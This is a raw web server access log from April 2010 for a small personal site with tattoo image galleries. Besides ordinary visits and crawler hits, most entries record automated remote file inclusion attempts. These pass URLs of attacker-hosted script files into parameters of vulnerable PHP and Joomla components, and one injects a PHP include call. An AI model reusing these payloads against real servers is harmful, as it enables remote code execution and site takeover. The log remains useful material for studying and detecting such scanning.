96.27.7.4 - - [07/Apr/2010:11:52:12 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.27.7.4 - - [07/Apr/2010:11:52:12 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.27.7.4 - - [07/Apr/2010:11:52:13 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.27.7.4 - - [07/Apr/2010:11:52:13 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.27.7.4 - - [07/Apr/2010:11:52:13 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.27.7.4 - - [07/Apr/2010:11:52:13 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.27.7.4 - - [07/Apr/2010:11:52:14 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.27.7.4 - - [07/Apr/2010:11:52:14 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
64.15.158.246 - - [07/Apr/2010:11:53:28 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:11:53:28 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:11:53:28 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:11:53:28 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:11:53:28 -0500] "GET /logs/access_log.1220054400%20%20///modules/4nAlbum/public/displayCategory.php?basepath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:11:53:28 -0500] "GET /logs/access_log.1220054400%20%20///modules/4nAlbum/public/displayCategory.php?basepath=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:11:54:03 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:11:54:03 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.193.197.59 - - [07/Apr/2010:11:54:03 -0500] "GET /logs/access_log.1220054400%20%20///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:11:54:17 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:11:54:18 -0500] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:11:54:18 -0500] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:11:54:18 -0500] "GET /logs/access_log.1267920000%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
207.46.199.178 - - [07/Apr/2010:11:55:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.62.251.26 - - [07/Apr/2010:11:55:50 -0500] "GET /logs/access_log.1268870400//?_SERVER[DOCUMENT_ROOT]=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
64.62.251.26 - - [07/Apr/2010:11:55:50 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 200 810 "-""Mozilla/5.0"
64.62.251.26 - - [07/Apr/2010:11:55:50 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:11:59:07 -0500] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:11:59:07 -0500] "GET /logs/access_log.1267920000%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:11:59:07 -0500] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:11:59:45 -0500] "GET /logs/access_log.1223164800//?path%5Bdocroot%5D=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:00:12 -0500] "GET /logs/access_log.1223164800//?path%5Bdocroot%5D=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:00:17 -0500] "GET /logs/access_log.1214784000//?path%5Bdocroot%5D=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.237.203.252 - - [07/Apr/2010:12:00:35 -0500] "GET //main.php?sayfa=http://mahaduna.com/admin/foto_berita/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
205.237.203.252 - - [07/Apr/2010:12:00:35 -0500] "GET /logs/access_log.1268265600//main.php?sayfa=http://mahaduna.com/admin/foto_berita/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
205.237.203.252 - - [07/Apr/2010:12:00:35 -0500] "GET /logs//main.php?sayfa=http://mahaduna.com/admin/foto_berita/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
205.237.203.252 - - [07/Apr/2010:12:00:35 -0500] "GET /logs/access_log.1223164800//main.php?sayfa=http://mahaduna.com/admin/foto_berita/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:00:41 -0500] "GET /logs/access_log.1214784000//?path%5Bdocroot%5D=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.237.203.252 - - [07/Apr/2010:12:03:37 -0500] "GET /logs/access_log.1218067200//main.php?sayfa=http://mahaduna.com/admin/foto_berita/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:09:57 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:09:57 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:10:05 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:10:05 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:10:05 -0500] "GET /logs/access_log.1219363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:10:07 -0500] "GET /logs/access_log.1219363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
184.73.4.37 - - [07/Apr/2010:12:10:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.4.37 - - [07/Apr/2010:12:10:57 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
207.46.204.189 - - [07/Apr/2010:12:13:58 -0500] "GET /logs/access_log.1227052800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.48.48.185 - - [07/Apr/2010:12:14:18 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6"
217.70.32.2 - - [07/Apr/2010:12:14:20 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:14:20 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:14:20 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:14:23 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:14:23 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:14:23 -0500] "GET /logs/access_log.1247529600//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:15:52 -0500] "GET /logs/access_log.1231718400%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:17:08 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:17:08 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:17:08 -0500] "GET /logs/access_log.1219449600//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:17:11 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:17:11 -0500] "GET /logs/access_log.1268611200//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:12:17:11 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:18:41 -0500] "GET /logs/access_log.1268956800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:12:19:04 -0500] "GET /logs/access_log.1268611200%20%20//index.php?option=com_frontpage&Itemid?mosConfig_absolute_path=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:12:19:04 -0500] "GET /logs//index.php?option=com_frontpage&Itemid?mosConfig_absolute_path=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:12:19:04 -0500] "GET //index.php?option=com_frontpage&Itemid?mosConfig_absolute_path=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:25:44 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:25:44 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:25:44 -0500] "GET /logs/access_log.1217203200%20%20///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:25:45 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:25:45 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:25:45 -0500] "GET /logs/access_log.1217203200%20%20///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:12:28:08 -0500] "GET /logs/access_log.1218067200//modules/vwar/admin/admin.php?vwar_root=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:12:28:08 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:12:28:08 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:12:28:12 -0500] "GET /logs/access_log.1218067200//modules/vwar/admin/admin.php?vwar_root=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:12:28:12 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:12:28:12 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:13 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:13 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:13 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:18 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:18 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:18 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:19 -0500] "GET /logs/access_log.1219536000//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:20 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:21 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:22 -0500] "GET /logs/access_log.1219449600%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:22 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:22 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:22 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:24 -0500] "GET /logs/access_log.1219536000//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:30 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:30 -0500] "GET /logs/access_log.1219449600%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:30 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:12:29:32 -0500] "GET /logs/access_log.1219536000//admin/spaw/spaw_control.class.php?spaw_root=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:38 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:38 -0500] "GET /logs/access_log.1219449600%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:12:29:38 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dgjinbo.org/board/data/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:32:15 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:32:16 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [07/Apr/2010:12:33:31 -0500] "GET /logs/access_log.1252800000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.227.141.53 - - [07/Apr/2010:12:34:06 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:34:06 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:34:06 -0500] "GET /logs/access_log.1217203200%20%20///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:34:12 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:34:12 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:12:34:12 -0500] "GET /logs/access_log.1217203200%20%20///e404.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
111.67.8.141 - - [07/Apr/2010:12:37:17 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://124.139.66.60/~home06dfl/baner.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
111.67.8.141 - - [07/Apr/2010:12:37:17 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://124.139.66.60/~home06dfl/baner.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
111.67.8.141 - - [07/Apr/2010:12:37:17 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://124.139.66.60/~home06dfl/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
111.67.8.141 - - [07/Apr/2010:12:37:52 -0500] "GET /logs/access_log.1219536000//admin/spaw/spaw_control.class.php?spaw_root=http://124.139.66.60/~home06dfl/baner.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.218.116.132 - - [07/Apr/2010:12:41:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.221.244.210 - - [07/Apr/2010:12:41:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:35 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:35 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:36 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:36 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:36 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.221.244.210 - - [07/Apr/2010:12:41:43 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
